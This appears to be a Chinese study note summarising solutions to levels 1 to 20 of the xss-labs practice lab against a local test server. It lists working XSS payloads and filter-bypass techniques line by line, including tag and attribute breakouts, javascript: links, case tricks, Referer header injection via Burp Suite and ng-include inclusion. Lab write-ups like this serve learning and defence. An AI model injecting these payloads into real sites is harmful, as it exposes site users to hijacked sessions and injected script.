xsslab爬关–01-20
在第11关中使用到了burpsuite 学习了相关的抓包改包发包操作
各关技术总结
<script>alert('xss')</script>
直接注入keyword="><script>alert(/xss/)</script>
直接闭合input标签,在html中注入'οnmοuseοver='alert(/xss/)
htmlspecialchars()函数吧标签转换成html实体标签><a href='javascript:alert(/xss/)'>xss
使用javascript伪协议插入链接><scRipt>alert(/xss/)</scRipt>
绕过大小写javascript:alert(/xss/)
使用转义符 r=‘r’;javascript:alert(/xss/)//http://
strpos()函数查找http://,记得在http://前加上//注释掉http://Referer: "οnmοuseοver="alert(/xss/)
使用burpsuit修改请求信息http://192.168.226.128/xss-labs-master/level15.php?src='http://192.168.226.128/xss-labs-master/level1.php?name="><a href="javascript:alert(/xss/)">xss'
ng-include:可以包含一个同域的页面,而这个页面是被注入xss的话本页面也会被注入xssarg01=version&arg02=<a href='javascript:alert(/xss/)'>xss</a>
flash反编译得到version参数未定义,从而传入恶意代码。